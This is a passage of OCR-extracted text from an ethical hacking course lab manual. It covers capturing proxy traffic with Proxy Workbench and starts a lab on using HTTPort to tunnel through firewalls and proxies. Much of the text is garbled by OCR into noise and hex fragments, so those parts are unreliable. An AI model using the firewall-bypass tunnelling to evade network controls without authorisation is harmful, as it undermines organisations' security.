u n d e rs ta n d s o c k e ts m u c h b e tte r th e n th e y th in k . W h e n y o u s u r f th e w e b a n d g o to a w e b s ite c a lle d w w w a lta v is ta .c o m , y o u a re a c tu a lly d ire c tin g y o u r w e b b ro w s e r to o p e n a s o c k e t c o n n e c tio n to th e s e rv e r c a lle d " w w w .a lta v ia ta .c o m " w ith p o r t n u m b e r 80

OK

Cancel

F IG U R E 13.9: P r o s y W o rk b e n c h H T T P fo r P o r t 8080

18. C lic k

C lose i n d i e C onfigure Proxy W orkbench c o n fig u ra tio n s e ttin g s Configure Proxy Workbench
Proxy Ports 3orts to listen on: Port | Description 25

w iz a r d a fte r c o m p le tin g d ie

Protocol assigned to port 8080 □ <Don't use>____________ □ Pass Through □ HTTPS □ POP3 □FTP

1 1 0
T h e re a l tim e lo g g in g a llo w s y o u to re c o rd e v e ry th in g P ro x y W o r k b e n c h d o e s to a te x t file . T h is a llo w s th e in fo r m a tio n to b e re a d ily im p o rte d in a sp re a d s h e e t o r d a ta b a se so th a t th e m o s t a d v a n c e d a n a ly s is c a n b e p e rfo rm e d o n th e d a ta

8080 443

2 1
1000

SMTP • Outgoing e-mail POP3 ‫ ־‬Incoming e-mail HTTP Proxy - Web HTTPS Proxy-Secure Web FTP ‫ ־‬File Transfer Protocol Pass Through - For T esting Apps

Add

delete

Configure HTTP for port 8080

W Show this screen at startup
F IG U R E 13.10: P ro x v W o rk b e n c h C o n fig u re d p ro x y

Close

1 9 . R e p e a t d ie c o n f ig u r a t io n s te p s o f P r o x y W o r k b e n c h f r o m 1 5 i n W in d o w s S e r v e r 2 0 0 8 V i r t u a l M a c h in e s .

Step 1 1 to Step

C E H Lab M anual Page 217

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

2 0 . 111

W indow s Server 2008

ty p e d ie I P a d d re s s o f W in d o w s 7 V ir t u a l

M a c h in e . 21. O p e n a

F irefox

b ro w s e r in

W indow s Server 2008

a n d b ro w s e w e b pages.

2 2 . P r o x y W o r k b e n c h G e n e ra te s d ie t r a f f ic w i l l b e g e n e ra te d as s h o w n i n d ie

& Proxy W orkbench changes th is . Not o nly is it an aw esom e proxy server, but you can see all o f th e data flo w in g through it, v is u a lly d isp la y a socket co n n e ctio n h is to ry and save it to HTML

f o llo w in g fig u r e o f 2 3 . C h e c k d ie

W indow s Server 2008 10.0.0.3
( W in d o w s

To

C o l u m n ; i t is f o r w a r d i n g d i e t r a f f i c t o

S e rv e r 2 0 0 8 v ir t u a l M a c h in e ) .

Mcnfanj MN1r2CiU.‫׳;־‬4 3 1 1 0 002 | |£ 4 A O T * !>
^ SHIP 0 .*!> > ‫<»׳‬ *»\‫ו‬1 ‫מן‬

^1 C Q C • ) ■l^ff»-0^r»IH1(l

0‫ ל‬7

I.(flff:iilf f llW '/ t ilH IU II

y H TI R F W -S.o i» W.6 (4 4 3 1 6 FIP Hori^ra *<X0:d|71) V p*m (1 1 0 *i !-f« r»»njA « c * n o 3 0 1

* lira •'f J

vr. u -‫י‬ < 1‫׳‬ *1‫נ^י‬

w M u o n 144a laccc
*0010041

»1 0 5 ‫גג‬.‫זמ‬
» 0525& 4 3 « 052*100 «05 261E ®0526217 K.W263K

06.K2S.31T 06052? ‫סט‬

A‫־‬ ‫־‬ « • ‫׳‬= ‫־‬

UK

laaaixzo 1 0 0 0 )»#
1444 ]•cto

M ta ia o n

u il .‫«־‬ :‫«־‬ . I• • 41 >1 . ‫נ‬ > 1 ‫י‬ 11 :‫נ־‬
U .‫נ‬

1 J‫נ‬ *J ‫י־‬

1 0 0 1 1 )* * a
14441400 *0 0 )•CM 14441«cm 1404 HCW 1400 )■IB 144a IK M 1400 )•CM 144a m e 1444 ItOM 140a1«:w 144 a 1t a t

te«it*1 KKrT
« 0526 IK tiiir, :1 iw. (6 0526 7 3 4

n n :1 1 9 ,

* « ‫? ׳•<״‬ 06052C92? CV9►*. ■ * 1 5 7 06®274B 5 5 6 06 052* ‫*׳* ? מ‬SfwAcwirw* 1 utre^rw r » 9 rM 0 ( a < rM . ‫נ מ ו‬ 'V**► —* 1191 * —' ■‫״‬ K052CTO «®27ug IV* 06052706

< V 1 3 r > M 4 c a 1 f a c ct W J
2 1 1 0 >•‫►•*)«׳‬ *»*•
. *‫״‬

(*0127 1 0 4

»0 $ 2 7 » ‫נ‬

K re z'S ) acr.rte
H B700

IV J 3 J4 1

3 ( 9 5

; v W> »».< * < * 1 1 9 9 06 052:7

1 1 •■ ‫י‬

.*1 •

10 0 0)acta

1444 laQHl 144a 14CM

2 —1

lO O Q lK W
31 20 10 30
78 4d 39 66 74 47 tl Od £1 30 6‫י‬ 20 IJ Ic 0. 70 2 6 63 4 5 72 47 65 32 64 3a 43

14,0127 ;71 m< k 27 4 1 1 (6 052743( C60127M• (6 0527 5 9 7 (6052702 £05£ ‫ נ‬7‫ ט‬3 0605275S7

»0J2n01

»0 5 ;‫יי»י‬

h ■ ■ < »(a‫•״‬a ‫׳‬

1»1

in

06»27» 0e « 2? 5 ae 06052»»l 06052*173

P A t h t f < k a » M c c
F V » 9 h n < * c o < n a < t 1 1 2 0

• ‫•י‬ •►».-*)«‫•׳‬-«

s au szs

t£S IS :4?

V *3 h M 4 1 «x > «d t 06052• 3 ‫י‬5 C

1 T \

1 1 10 ) 1112 t t i r t F r i . 23 0 *>: w 0c « 2* 1‫ י‬.'0 10 >4 3 C]‫׳‬141 > 3 n :*dta-Caat

SotExterna0M&4 CSC[ 10 S . . : : i l 00 52 «::>*€ 4‫ י‬a ir u . - u

«0M4S 1 •0 17 34 a n

20 u 64 30

:3 «0 0 0 0 1 6 0 o: .ji-age > 0 00 1 7 4 «t0 ‫׳‬1 ?2

4 50 ‫ ל‬M 4c

Q o1 3 tl 04 d 61 7a« 20 ?.( b I «m Cm
61 6‫ י‬7*

32 30 31 4; 41 0• 38 20 >> 10 ?0

31 ro 0 ‫נ‬ 4c (1 7 i 32 (3 3d (3

?2 W 2c
3d U 41 74

4 5MH

3» K »7 (1

2 0 «(
Sf <4 30 I I

F IG U R E 13.11: P ro x y W o ik b e n c h G e n e ra te d T ra ffic in W in d o w s S e rv e r 2012 H o s t M a c h in e

2 4 . N o w lo g in in to

c o l u m n ; i t is f o r w a r d i n g d i e t r a f f i c t o M a c h in e ) .

W indow s Server 2008 V i r t u a l M a c h i n e , a n d c h e c k 10.0.0.7 ( W i n d o w s 7 V i r t u a l

d ie

To

F if eV ie wT o d *H r ip
M irilcrrfj ‫•׳‬ ‫ וי‬hin i'iii/'l 3 |10 0 0 3| !'*!41.

$A M r/M |y
^

1

‫■׳‬ IT IF* F' t »v •W<*b(>]CH])

1

£ 7 A n d n o w , P ro x y W o r k b e n c h in c lu d e s c o n n e c tio n fa ilu re s im u la tio n stra te g ie s. W h a t th is m e a n s is th a t y o u c a n sim u la te a p o o r n e tw o rk , a s lo w In te r n e t o r u n re s p o n s iv e se rv e r. T h is is m a k e s it th e d e fin itiv e T C P a p p lic a tio n te s te r

fm■ ^d¥)006«ff)ft •lr«Mfiin3 £J10.00.6»10 jtJ':a:fc3 114 £ J'].0 0.6 9 0 1 5 & mo 0.6 to 10 0.0 7 £ J 6 ; 0 : ‫־‬snt £J10 0 06 9 8 19 " W FrP-Fielienifei Ftolord 1 • Nol Lit* £ h !0 a.6 9 8 20 PdssThioj^i F01 Tastro^o*nOOOl fJ jh J'I 0 0.&9B22 £1100169824 £110 00 69826 £1100069828 £1*100.6 9 8 3 0 £110 0 0& 9H32

P O P 3 0 n » iir 1 C 1 Qwpnmamm ■ H1 Q O Q 2 I0 1 Q Q Q 7 H T 1 P 5R o « vS e o jicW e b ( 4 4 3 1 | 2 1

,iM T P •Outguny ••fr«l(25|

1 1000701C O 1a0.a?;8D80 lQ0D7-mm 1aoa7.83E0 ‫ ו‬00 07:‫שנט‬ 1Q007:83E O 1ao.a?;83a1 1aoa7!ffiEa 1a0.a7:83EO 1Q0a7:fflffl 1000.7:8303 1a0.Q7.83EO mon7rmgo

HTTP H IIP HUP HTTP HITP HTTP HUP HUP HTTP HTTP HTTP HTTP H1IP 1 76 4d 39 66 74 47 6t Od 65 70 61 20 69 20 4d 6c 69 72 72 20 47 Id 6S 64 32 30 JJ 30 20 0 9 43 61 70 2d 61

11‫ *!י׳‬f . •1 ‫״‬i K su w 0 T ) tB 40 !00 F 061B33 750 06tt»411 5 6 K 06.05 40109 Q 3 40 !0‫־‬ < ‫׳‬ B U. 9 (h 4 10 7 0 F 06.(E « 375 0 3 00.41.625 F (£06 41437 0,0141 ms F 0606 *3 5 3 1 0 5 05 4 12 8 1 F 06.05 « 546 06.0541.281 F 05<E 40 578 (E05 40Bt3 F 06:0=4:655 0 6 05:41.828 F 06 05*3 906 (K O S4 15 9 3 F 06<e 41015 0605 4 14 0 6 F 0 6 05 4 17 1 8 F 06.0C4 1 *09 (KtR 4 1 TIB as 05 4 1^ 1 1 Fj 2J

d

fte d c M sF o iH rT PP ic e a y• V / H 3 | B 0 B ]| p iro D So t 2 6 :1:064 Sx 010080 IUr 2 0 1 10 0G 2
‫ ־ ־ ־‬09* 060112

*1

a
65 73 3a 32 30 31 S4 0d 04 20 16 30 39 20 G« <3 61 fd 61 78 6« 60 65 (c 69 6‫ל‬ 20 S3 i l 74 ? ‫פ‬ 31 20 30 30 3a ic 61 73 74 .?rf 7 2 b'3 2c 20 32 63 2d 63 65

0 0 0 1 2 C 060144 0 6 0 1 6 0
060176 080192

<0 CUT hint. Nrd 1 1 t.wd. f t 1 . 23 0 c t 2009 20•10 04 GMT. . C»cho-Cont roL max-oge-360 0. Connect io a k oe p - o livc

3 23 03 .‫ י‬3 13 0
b0 61 74 Od
t ')

65 2d ■ 4 3 6? 65 3d bl 6• 0o Od 0o

Mar a y 3ES KBylei

T» 1mnate 01( R cIlb c Qr

'h rb»f‫־‬

C m ^ !‫ ׳‬CK -oggrg 01( 613AM 6:15 AM

J

Start |

Proxy Worfctxfyh

A iL d

F IG U R E 1 3 .12 P ro x y W o rk b e n c h G e n e ra te d T ra ffic in W in d o w s S e rv e r 2003 V irtu a l M a c h in e

C E H Lab M anual Page 218

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

2 5 . S e le c t O n d i e w e b s e r v e r , c o n n e c t t o a n d c lic k

p o rt 80

in

W indow s 7

v ir t u a l m a c h in e ,

OK
-TTTP Properties

General |

(• On the *tcb server, connect to port: C " Connect vb atoihcr proxy

Pro<y :erver: 110.0.0.5 Port: [fiflffi

H I I t a llo w s y o u to 's e e ' h o w y o u r e m a il c lie n t c o m m u n ic a te s w ith th e e m a il s e rv e r, h o w w e b p ag es a re d e liv e re d to y o u r b ro w s e r a n d w h y y o u r F T P c lie n t is n o t c o n n e c tin g to its s e rv e r

OK

il

C«r>cd

F IG U R E 13.13: C o n fig u rin g H T T P p ro p e rtie s in W in d o w s 7

2 6 . N o w C h e c k d ie tr a f f ic i n

10.0.0.7

( W in d o w s 7 V ir t u a l M a c h in e )

“ TO”

c o lu m n s h o w s t r a f f ic g e n e ra te d f i o m

d ie d if f e r e n t w e b s ite s b r o w s e d i n

W indow s Server 2008
" Unix
p i?

w a»

'*wts c « > » w

Wd

iso

«
r*e

>» : ® o 11 1► ; > ■
V W ur Toeli Help

‫הו‬7‫צ&ו‬

Q2 In the C onnectio n Tree, if a p ro to c o l o r a c lie n t/s e rv e r p a ir is se le cte d , th e D etails Pane d isp lays th e sum m ary in fo rm a tio n o f all o f th e s o c k e t c o n n e c tio n s th a t a re in progress fo r th e se le c te d ite m on th e C onnection Tree.

n*Vlet»7naQa7}
ft A ll«5 ctr»*y

DcUI1 t a H T T P IW - W « b 1 8 0 8 0 1 From *010.0 D32237 )0 1 0 0 0 32239 )8100032239 ;0100032240 )0 10 0 0 32241 ) 0 10 0 0 3 2242 50100032243 )0 1 0 0 0 3 224( )0 10 0 0 3 2245 )9100032246 )0 10 0 0 22 ‫נ‬c )610 0 0 3229 ) 0 10 0 0 3 224) ',W10 0 0 3 2250 ­ ‫י‬: .‫ גן‬.*3 ‫ד‬26E0 I1 :-.h< . •571SS22G.aK:£0|adi ‫ * י‬7820612£»0 6 ‫»*<י‬ ‫ י‬9878206126* 0 * 0* » 1337320612!6c0|ic>*1t.. 2027921012140 (t * K 1 Pictocoi HUP HTTP HTTP HTTP 06:0634.627 0&£634643 C6X634S66 C6:(634$G6 06:C&34.336 ££.0634 S£3 06C636030 C 6 (& .X.2l£ 0 fe » 354 » 06:0636483 06C03CW3 06.06 3U6U6 flf.r»3570? t e a . 56 786 060U363W C fr» X C 7 ? C6:0636124 C6:Cfc36.166 06:0636216 C£C&36‫־‬££ C6C636366 06.C&36.606 U sE ^ rl 1 laslSUto 06.05:35.436 FV»B ho? J'.ccrncc•... 0 £ < 6 2 « 3 fVt'B hai d : c f r r « l 06(636390 06(635624 060636624 c e c & x 21e (6(636186 060&355W C M & X T tS P*J»3 l « J i « r r « l . . . f * ■ ‫ ?״‬hasdaxrrecJ... FV>B bn d s O T iw l‫״‬ Km d : « r r « l FWB hat d n c r m l . ha* d if fr r w l I

m il► B/*5 C25 1 BylesS 1577 0 1555 0 1556 1950 1131

^ SM TP • Ouiflonfl e ‫״‬id |2 5 | K » ‫־‬C‫־‬C Ir«m^1*fflalf110l ‫ד‬C lC lC l3to1 0005 10003to 2 0 3 .8 5 .2 3 1 .8 3 |m ‫־‬j.Br c > ’00031# 6 87 12 0 91 7 6|abc g oc 100031a 5 02 70 62 0 7|edn> m )k| 100031a 5 8 .2 7 .8 6 .1 2 3ledge Bus 100031a 6 87 12 2 01 6 5|ab c cm 100031a 2 0 27 92 1 01 2 1 Ibi.ta* 10003b) 2 0 51 2 88 4 .1 2 6 100031a 5 02 78 61 0 5|f«*\1 ur 100031a 5 827.06.21; I1 d 1 « u .« t> 100031a 1 5 71 6 62 5 52 1 6M d ic 100031a 1 5 71 6 62 5 53 1 |r«iv, 100031s 2 0 38 52 1 11 4 8lilt 100031a 2 0 31 0 68 55 1 |bkcmc 100031a 5 02 70 62 2 5|s etrrcd 100031a 1 5 7 .1 6 6 .2 2 6 .2 6Iwmc 100031a 1 9 99 36 21 2 6 100031a 2 0 3 .1 0 6 .8 5 .6 5 |1 p e .< M r 1000310 2 0 74614 83 2!view* 100031a 6 62 3 51 3 05 9Ix ffc c m 100Q3la 2 0 3 .1 0 6 .8 5 .1 7 7Ib.scae 100031a 02 62 0 71 2 6ledn vrtt 100031a 1 5 71 6 62 2 63 2|tve±a 100031a 5 82 72 27 2|r.«*\tum 100031a 1 9 07 02 0 61 2 6|icchk 100031a 1 5 71 6 62 2 6 .4 6ledlnr^ 100031a 6 62 3 51 4 22 4|rrel1 b)< 100031a 2 0 31 0 60 51 7 6Idi M rw 1000311 1 5 7 .1 6 6 .2 5 5 .1 3Im m m a 100031a 6 87 12 0 91 7 3 |4 b c fl0<

HTTP HTTP HTTP 57‫ י‬iffi 2262(680|**» 5621 4 3 1 1‫ מ‬lOtCImet71c . h i TP HTTP : 01106 9517&»<‫>ן‬4 «»‫ו‬ ‫ ־‬,‫־ ׳‬ ••-. 1 1 :1 |. . : HI TP HI IP '» ra 2 D 5 1 2 e w 0 a * u HUP J0n>206120WI1«ht HTTP 1«7820612S8000<ht • ‫קי‬ ‫ ן‬ftfC|v».»w HUP h i IP HTTP

2110
447S 2710 1572 ‫ויי‬ 11« IA » 2‫ ט‬3 1183 2i03 . , MS

) 0 10 0 0 32251 ) 0 1 OOO 322C
‫־‬M 1000 32253 )0100032254 ) 0 10 0 0 32255 )01OOO322S )0 10 0 0 32257 )010.0.0.32258

828 > 18 1 -Sani2 a h b j
'»ra20612t<«)BCTht •3873206126t01icdn.. 397920G1;&£C|1‫־‬ «fce ‫־‬ i»78206l260Hiceht 157.1652262660) l«fc

H TTP HI T P HI T P H TT P H TTP H TT P

(6 (C!36 (66 (*(CJ&124 0606J6243 rv>V bm d iw riK l... ff .f fT V W * ® K » d n (rr « 1 . • > COOUJCW 1 8 ‫ ״י‬h o d im r M l. M hoi d iM r m i 06(636718 ^ I « n l 1a r r « l... 0606367*9 ‫ *יי‬8 060636611 FVrtJ he! diccrriKl.. 0&0K36&2? PV.9‫־‬ hatiic e r r c c t..
06(6368(6

3 3 33
2125

0 0 0 0 0 0 112 0 0 0 0 0 0 0 0
358

2(21
1124

060637.436

t te d 2 « r r« * ... FVjB h s d.ccrrecl...

1120

1 5 3 3

0 0 0 0

p e al line dsis is• HTTP P * • / ■ Web (9060) 000160 000192 000206

000176

Wi 30(« 5et. 55 000224 26 bar 2011 00 20 000240 ?2 3 1 CUT Conn* 3S 000256 ct*oc .iv s * . Co 61 60 000272

ISL

Btwt-Uim h 2 0

61 72 64 69 4f i l 4e 32 32 74 ?4

60 6 P 20 id

75 3a 20 Od 4? 4? 22 O d 36 20 4d 3a 33 31 6 ? 6 ( 6■ 656a ?4

41 0a 56 0» 61 20 3• 2d

63 60 61 44 ?2 47 20 4c

20
61 20 4tJ 6) 65

63 33

6 5 ? 0 7 4 2 d 4 61 3 6 ‫ ־ ג‬.‫־‬

SO if 74 32

3a 2043 50 3d 22 ?5 S220 42 5? 53 65 3•20 53 (1 74 30 3131 20 30 30 ?4 0 1 1 0a4 ) ii 6e (e &c Cl ?3 65 CJ 0■ 43 t>0 67 30 32 20 *3 68

40 20 2c 3a 65 il 4 ‫ל‬

_ L* a
and

F IG U R E 13.14: P r o s y W o rk b e n c h G e n e ra te d T ra ffic in W in d o w s 7 V ir tu a l M a c h in e

L a b

A n a ly s is

D o c u m e n t a ll d ie

IP addresses, open p o rts

and

running a p p lica tio n s,

p r o t o c o l s y o u d i s c o v e r e d d u r i n g d i e la b .

C E H Lab M anual Page 219

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

T o o l/U tility

In fo r m a tio n

C o lle c t e d / O b je c t iv e s A c h ie v e d

P r o x y s e r v e r U s e d : 1 0 .0 .0 .7 P o rt s c a n n e d : 8080 P ro x y W o rk b e n c h R e s u lt: T r a f f ic c a p tu re d b y w in d o w s 7 v ir t u a l m a c h in e ( 1 0 .0 .0 .7 )

P L E A S E

T A L K

T O

Y O U R

I N S T R U C T O R T O T H I S

I F

Y O U

H A V E

Q U E S T I O N S

R E L A T E D

L A B .

Q u e s t io n s
1. 2. E x a m in e t h e C o n n e c t io n F a i lm e - T e r m i n a t io n a n d R e fu s a l. E v a lu a te h o w r e a l- tim e lo g g in g r e c o r d s e v e r y t h in g i n P r o x y W o r k b e n c h .

In t e r n e t C o n n e c tio n 0 Y es S u p p o rte d

R e q u ir e d □ N o

P la tfo r m 0

C la s s r o o m

iL a b s

C E H Lab M anual Page 220

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council AB Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

HTTP T unneling U sing H TTPort
H T T P o / f is a program f r o m H T T H o s f that mates a transparent tunnel through a p m x j server orf/renall L a b S c e n a r io
a r e a lw a y s i n a h u n t f o r c lie n ts IP a t h a t c a n b e e a s ily c o m p r o m i s e d to dam age and

I CON
V a lu a b le

KEY

A tta c k e rs

in fo r m a tio n

th e y c a n e n te r th e s e a tta c k e r can get

n e tw o rk s w it h th ro u g h

s p o o fin g by

o r s te a l d a ta . T h e d ie IP a d d re s s . to d o in If th e

Test vour k n o w le d g e

p a c k e ts to

fir e w a ll

s p o o fin g

a t t a c k e r s a r e a b le p r e v io u s la b ,

c a p tu r e n e t w o r k t r a f f ic , as y o u h a v e le a r n e d can p e rfo rm T r o ja n to a tta c k s , be r e g is tr y fo r

3

th e y

a tta c k s , an

p a s s w o rd

W e b e x e r c is e

h ija c k in g
W o r k b o o k r e v ie w

a tta c k s , e tc ., w h ic h

can p ro v e

d is a s t r o u s

o r g a n iz a tio n ’s

Q

n e tw o rk . A n

a tta c k e r m a y u s e a n e tw o r k p r o b e

t o c a p tu r e r a w p a c k e t d a ta a n d

th e n u s e th is r a w p a c k e t d a ta t o r e tr ie v e p a c k e t i n f o r m a t io n s u c h as s o u rc e a n d d e s tin a tio n IP a d d re s s , s o u rc e and d e s tin a tio n p o rts , fla g s , header le n g th ,

c h e c k s u m , T im e t o L iv e ( T I L ) , a n d p r o t o c o l ty p e . T h e r e f o r e , a s a n e t w o r k a d m i n i s t r a t o r y o u s h o u l d b e a b le t o i d e n t i f y a t t a c k s b y e x tr a c tin g in f o r m a t io n fro m c a p tu re d tr a ffic s u c h as s o u rc e a n d d e s tin a tio n I P a n d d e s tin a tio n p o r t s , e tc . a n d

a d d re s s e s , p r o t o c o l ty p e , h e a d e r le n g th , s o u rc e c o m p a r e th e s e d e ta ils w i t h

m o d e le d a t t a c k s ig n a tu r e s t o

d e te r m in e i f a n a tta c k

h a s o c c u r r e d . Y o u c a n a ls o c h e c k t h e a t t a c k lo g s f o r t h e l i s t o f a t t a c k s a n d ta k e e v a s iv e a c t io n s . A ls o , y o u s h o u ld b e f a m ilia r w i t h can id e n tify a d d itio n a l s e c u r ity th e H T T P r is k s th a t t u n n e lin g te c h n iq u e b y w h ic h y o u m ay n o t be r e a d ily v is ib le by

c o n d u c t in g s im p le n e t w o r k a n d v u ln e r a b ilit y s c a n n in g a n d d e t e r m in e th e e x t e n t to w h ic h a n e tw o r k ID S c a n i d e n t i f y m a lic io u s t r a f f i c w i t h i n a c o m m u n ic a t io n T u n n e lin g u s in g H T T P o r t .

c h a n n e l . 111 t h i s l a b y o u w i l l l e a r n H T T P

L a b

O b je c t iv e s
n e tw o rk s c a n b e s c a n n e d a n d h o w to use

T h is la b w i l l s h o w y o u h o w and

H T T P ort

H T T H o st
E n v ir o n m e n t
la b , v o u n e e d d ie H T T P o r t to o l.

L a b

1 1 1d i e

C E H Lab M anual Page 221

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

H T T P o r t i s lo c a t e d a t

D:\CEH-Tools\CEHv 8 M odule 03 S canning N e tw o rk s \T u n n e lin g T o o ls\H T T P o rt H T T P o rt
fro m d ie lin k

Y o u c a n a ls o d o w n l o a d t h e la t e s t v e r s io n o f h t t p : / / w w w .t a 1 g e t e d . o r g /

I f y o u d e c id e t o d o w n l o a d t h e la t e s t v e r s io n , t h e n s c r e e n s h o t s s h o w n i n th e la b m i g h t d i f f e r

£ " Tools d em o nstrate d in th is lab are ava ila b le in D:\CEHTools\CEHv 8 M odule 03 Scanning N e tw o rks

■ ■ ■

I n s t a ll H T T H o s t o n I n s t a ll H T T P o r t o il

W in d o w s S erver 2008 W in d o w s S e rve r 2 0 1 2

V ir t u a l M a c h in e H o s t M a c h in e

F o l lo w t h e w iz a r d - d r iv e n in s t a lla t io n s te p s a n d

in s ta ll it.


A d m in is tra tiv e p riv ile g e s

is r e q u i r e d t o r u n d i i s t o o l tu n n e lin g

T h is la b m ig h t n o t w o r k i f r e m o te s e r v e r f ilt e r s / b lo c k s H T T P p a c k e ts

L a b

D u r a t io n

T im e : 2 0 M in u te s

O verview o f H TTPort
HTTPort
bypasses c re a te s a t r a n s p a r e n t t u n n e lin g t u n n e l d ir o u g h a p r o x y s e r v e r o r fir e w a ll. H T T P o r t a llo w s u s in g a ll s o r ts o f I n t e r n e t S o f t w a r e f r o m b e h i n d d ie p r o x y . I t

HTTP p ro xie s

and

HTTP, fire w a lls ,

and

tra n sp a re n t a ccelerators.

L a b

T a s k s
B e fo r e r u n n in g d ie t o o l y o u n e e d t o s to p

Stopping IIS S ervices
2.

IIS A dm in S ervice

and

World

W ide W eb Publishing se rvices
G o to

on

W indow s S erver 2008 v irtu a l m achine. S ervices IIS Adm in Service,
r ig h t

A d m in is tra tiv e P rivileges Stop
o p tio n .

c lic k a n d c lic k th e

01 HTTPort cre a te s a tra n sp a re n t tu nn el th ro ug h a proxy se rve r or fire w a ll. T his a llo w s you to use a ll so rts o f In te rn e t s o ftw a re fro m behind th e proxy.

C E H Lab M anual Page 222

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

IIS Admin Scrvict
Sioo th- service

5.estart thesevce
Docrpton: Enabltc 6‫ י‬1 1 « ‫ « > ־‬to * d 1 ‫־‬n v j ! t ‫ •־‬::s ‫ » ׳ ׳‬: « * « ‫ «יי־‬H5 ‫׳‬X 'J tK C »r*ou‫׳‬M1 0 n *or ‫ «ימ‬SK*® one FTP :‫»־‬ i « ‫׳‬v«' n il * u « * to am f g.«« S or ftp. :, the servce e c jx c «. an, fa I tottait.

1 * r v io r *t h u m v t e• t t a u p r d . 2 16 — 3
se1/ ‫׳׳‬ee* *v9!t»porv dfpeo; o• *mI

K a-n- * '*,FurcBon Discovery Provide Host P-rcoco Decovery Resource PJ>lc3ten ■ C ^ C rO v OPoicy Cent Key aid Cerbfeate Mens9»trp-t £,h\jma1 :rtc'frc• Devi:• Access CfchyMr-v m u txchanoa s w a <|1 Hyoer-VGue»t Shutdown Se‫׳‬v » o e < £^Hyp*r«VUtatoeat Stive* '^,hvsf'-v Tir* Syndvonuaton Save• ‫•'־׳‬X‫ « ׳‬V0iuneSh«30WC00VR«UMCDr £.32 a‫־‬ ‫־‬ d Au0!:p tPMC *C eyUg M odJet C feInteractive services Detection 4 Internet Cornecton Shwrng CCS) IP helper £,IPsec PoIcy Agent :£ JkctR.t1* v ‫<־‬ £ trbuted Transaction Coordnsso‫־‬ ^Irtt-tover To»og>•Discovery1 “tepee?iwicroajft KETFrans0‫ ״‬rk N GB<v3 0.50727_kfr■ ;*Microsoft .rcrFraroenorkNGei v: 0.50727_>« '■*, M0090* Fb‫־׳‬ e Channel ^stfo'Ti Res^Cstcn Se* ^ M C T 0 M*t 6 CSI ]ntigtor Service ^Vbon*! Software Shacton Copy P'ordfi Q,MoJU Manteimce Save•

I CeKri3bcn | 5:afc_s hostcroca.. , Stated P-behes t... Started The serve... Started P-o-rde*X... E'aolas 9a P0‫־‬ vd81 a .. . started fvovdes a .. . Started Va-iton th... 5hr ted Syrdvcnj . SUr'tid cocfdnjte _ 1urted S tJt________ P.-llv Res-re R«3rt jn...
! * "

St* lid

Started . 5:cited AITmks ►3te , Started -- ‫ ־‬0 ... Started Proprf br% t .... Stated 8‫ ־‬t.. wb ,‫ן‬ W ragn «... Th*M00IU..

_J

‫ץ‬

Stana*.- J ~

>t:p jcrvce IL Acrrr StrVtt on L O C OCaiOutt* F IG U R E 14.1: S to p p in g I I S A d m in S e rv ic e in W in d o w s S e rv e r 2008

3.

G o to

A d m in is tra tiv e P rivileges

S ervices

W orld W ide Web
o p tio n .

Publishing Services, & It bypasses HTTPS and HTTP proxies, tra n sp a re n t a c c e le ra to rs , and fire w a lls . It has a b u ilt-in SOCKS4 server.
*te Action jjen Kels

r ig h t - c lic k a n d c lic k d ie

Stop

E f IB [ >rrf | E N^ltwl ‫ רי‬AbServwj C lomJ)
I S « v « « (lo ca l) v;‫ ״‬tid Wide Web PwbW-mg SrrvK ‫ י צ‬n e servce Rf*t»r; ‫ «י‬t t ' t e

.1

‫־‬ SfcvOU

1
S’ Mijs. Coov AudO

CwJOCor P1cr> *0M ‫זו‬... MWU0K*... TUtWtbM.. Mo'eOcS a... Ha'sOeid... ‫־‬he W a P l.. Ha-aoesr... Ha‫־׳‬aoe; u... Ab ‫־‬ .-sero... Thssevfc... Thssevfc... ViW owsF.. .

I S !a w

j

C«so aion: (V» ‫׳‬d f Web a n ‫־‬w r< r r end » ‫דדלמי׳ו־כ‬: ‫ ח‬rr y .y ■ f c :‫ ־‬rr‫ ״‬r lnforrr~-.cn 5e r a * ‫ ־‬Hjrage-

2 8 11 1

CfetYea Mar^aoerent S e ‫<׳־‬ ce % Vrd ^ «v‫׳‬xto/.9 Aucto ErekJrtit s J s e ^ Y‫־‬ ‫<־‬ to/.S Cotor SySteri £ (M fld M Dectoymeot Sevces Serve ^ M m s Driver Fourdaoon -Lee ‫״‬cce Diver “ ‫ ׳ * ־‬xr1 ‫״‬ ■ ‫־‬ . . «Y‫־‬ ‫־‬d ‫׳‬/.s & ‫ ׳ ׳‬Repo ‫ יט ׳‬Semoe i^ %Yrd ? ‫׳‬e i: Cotecto % \V'tkr/.$ ®‫׳‬e it uw ^!Y rd o/.s F»e.\dl $*Yrd>/.e CngU i/ler CJt«Yrtto/.9 1 1 «v‫־׳‬d0/9 ModJes trwtalei I

0

'1 1 > / .9 1 0 3 0 8 » / .9

1

Ste tec Stated Stated Stated Stated Stated Stated stated stated

aat

‫ו׳‬5«‫י׳«יו״‬ ‫׳‬ ‫י‬ ‫מ‬ ‫ק‬ I ^ r Re*»t
a it m

Adds, m od■ .‫״‬ ftovd » a ... & » a b « n s... ‫•יזל‬ V J« o ‫» ״‬B... M ints‫ *׳‬S.. . KrHTTPl... ^***TMC... Pre‫* ^־‬

C i« v‫׳‬xto/.® BioceM Activation Seivd ^ ■V'cto/n 5«mote M ‫׳‬V e‫*«״‬nt M try ^ %Y‫׳‬Yfew,« uoflat* ^ * v r H n p webP'oxvAuto-oaeovJ ^ . v ‫»׳‬ < -Autocar *c Perfcrwsrce Aflao*‫׳‬ •\'08>'‫׳‬taecr

30

U n d o ...

*■

»

H n y r B fi bet)

06 0

‫״‬ Stated

JE 3 S JB
\ £ x a r d e ; A Sarri8•: /

